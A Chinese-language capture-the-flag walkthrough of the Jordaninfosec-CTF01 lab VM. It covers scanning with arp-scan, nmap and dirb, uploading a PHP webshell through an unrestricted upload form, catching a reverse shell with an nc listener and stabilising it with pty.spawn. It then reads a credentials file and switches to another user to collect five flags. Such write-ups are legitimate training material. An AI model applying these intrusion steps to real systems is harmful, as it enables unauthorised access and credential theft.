背景介绍

注意:一开始ip查找,并没有找到,后来发现靶机的网卡并没有启动

修复方法:

  • 进入bash 咋这个界面下安字母 ‘e’键

    找到ro的位置

    将其更改成 rw single init=/bin/bash

    然后ctrl +x进入bash,输入ip a 查看网卡信息

    查看网卡配置信息vim /etc/network/interfaces

    将网卡名改成与之前ip a命令查看到的名称一致,然后重启网卡

    输入 /etc/init.d/networking restart

    之后就能成功获取到ip

信息搜集

arp-scan -l 查找目标192.168.32.129

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3a:85:4a, IPv4: 192.168.32.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.32.1    00:50:56:c0:00:08       VMware, Inc.
192.168.32.2    00:50:56:f0:a6:e2       VMware, Inc.
192.168.32.129  00:0c:29:c2:68:53       VMware, Inc.
192.168.32.254  00:50:56:f4:b7:bc       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.861 seconds (137.56 hosts/sec). 4 responded
                                                                                                   
┌──(root💀kali)-[~]
└─#

nmap -p- 192.168.32.129 查找开放端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root💀kali)-[~]
└─# nmap -p- 192.168.32.129
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-21 14:07 CST
Nmap scan report for 192.168.32.129
Host is up (0.00079s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:C2:68:53 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.74 seconds
                                                                                                   
┌──(root💀kali)-[~]
└─#

浏览80页面,这个登陆在不知道身份信息的情况下爆破的几率不大

dirb 进行目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root💀kali)-[~]
└─# dirb http://192.168.32.129 /usr/share/dirb/wordlists/big.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Aug 21 14:14:01 2021
URL_BASE: http://192.168.32.129/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.32.129/ ----
==> DIRECTORY: http://192.168.32.129/admin_area/                                                  
==> DIRECTORY: http://192.168.32.129/assets/                                                      
==> DIRECTORY: http://192.168.32.129/css/                                                         
==> DIRECTORY: http://192.168.32.129/flag/                                                        
==> DIRECTORY: http://192.168.32.129/js/                                                          
+ http://192.168.32.129/robots.txt (CODE:200|SIZE:160)                                            
+ http://192.168.32.129/server-status (CODE:403|SIZE:302)                                         
==> DIRECTORY: http://192.168.32.129/uploaded_files/

第一个flag

查看robots.txt

逐个查看里面的文件后发现身份信息喝第二个flag

文件上传

尝试使用这个身份信息登陆login.php

登录成功后发现这是一个文件上传的地方(这不告诉我们这里可以上传一个后门吗)

使用不知道从哪里搞来的一个shell进行上传(注:这里也可以使用php一句话木马,或者一系列的漏洞框架生成的后门)

点击Browse选择文件后点击Upload file上传,之后如图所示左上角出现Success

连接后门

之前目录扫描出来有一个路径/uploaded_files/ ,尝试根据这个路径看能否找到我们上传的shell

成功找到并访问成功

输入shell.php种内置的密码

成功登录

进入网址根目录,发现flag目录、flag.txt,hint.txt

flag目录下存储的是之前找到的第一个flag,flag.txt打开之后啥也没有(权限问题),

hint.txt看到的是第三个flag,和提示找到用户technawi的密码就能读取flag.txt

反弹shell

使用命令:find / -user ‘technawi’ >/dev/null

但是这个shell下的命令执行不太好使,所以需要一个好使shell,通过这个shell下的一个功能进行反弹shell

同时kali终端始入nc命令进行监听,

1
2
3
4
┌──(root💀kali)-[~]
└─# nc -lvp 12388          
listening on [any] 12388 ...

然后点击开始连接,

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~]
└─# nc -lvp 12388          
listening on [any] 12388 ...
192.168.32.129: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.129] 60222
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

成功得到shell,但是需要输入命令:python3 -c “import pty;pty.spawn(‘/bin/bash’)” 得到一个稳定好使shell

1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[~]
└─# nc -lvp 12388          
listening on [any] 12388 ...
192.168.32.129: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.129] 60222
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$

这个时候再输入查找命令:find / -user ‘technawi’ 2>/dev/null

1
2
3
4
5
6
7
8
9
10
11
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ 
/etc/mysql/conf.d/credentials.txt
/var/www/html/flag.txt
/home/technawi
/home/technawi/.cache
/home/technawi/.bash_history
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$

查看credentials.txt文件得到第三个flag与technawi的用户信息

1
2
3
4
5
6
7
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt
<1:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt       
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$

su technawi切换用户

1
2
3
4
5
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ su technawi
su technawi
Password: 3vilH@ksor

technawi@Jordaninfosec-CTF01:/var/www/html/uploaded_files$

查看网站根目录下的flag.txt文件得到第五个flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
technawi@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ cd ..
cd ..
technawi@Jordaninfosec-CTF01:/var/www/html$ ls -la
ls -la
total 60
drwxr-xr-x 8 www-data www-data 4096 Apr 21  2017 .
drwxr-xr-x 3 www-data www-data 4096 Aug 21 08:44 ..
drwxrwxr-x 2 www-data www-data 4096 Apr 21  2017 admin_area
drwx------ 5 www-data www-data 4096 Apr 19  2017 assets
-rw-r--r-- 1 www-data www-data  306 Apr 19  2017 check_login.php
drwx------ 2 www-data www-data 4096 Apr 19  2017 css
drwxr-xr-x 2 www-data www-data 4096 Apr 21  2017 flag
-rw-r----- 1 technawi technawi  132 Apr 21  2017 flag.txt
-rw-r--r-- 1 www-data www-data  145 Apr 21  2017 hint.txt
-rw-rw-r-- 1 www-data www-data 1966 Apr 19  2017 index.php
drwx------ 2 www-data www-data 4096 Apr 19  2017 js
-rw-rw-r-- 1 www-data www-data 1485 Apr 19  2017 login.php
-rw-r--r-- 1 www-data www-data  128 Apr 19  2017 logout.php
-rw-rw-r-- 1 www-data www-data  160 Apr 19  2017 robots.txt
drwxrwxr-x 2 www-data www-data 4096 Aug 21 09:24 uploaded_files
technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt
cat flag.txt
The 5th flag is : {5473215946785213456975249}

Good job :)

You find 5 flags and got their points and finish the first scenario....
technawi@Jordaninfosec-CTF01:/var/www/html$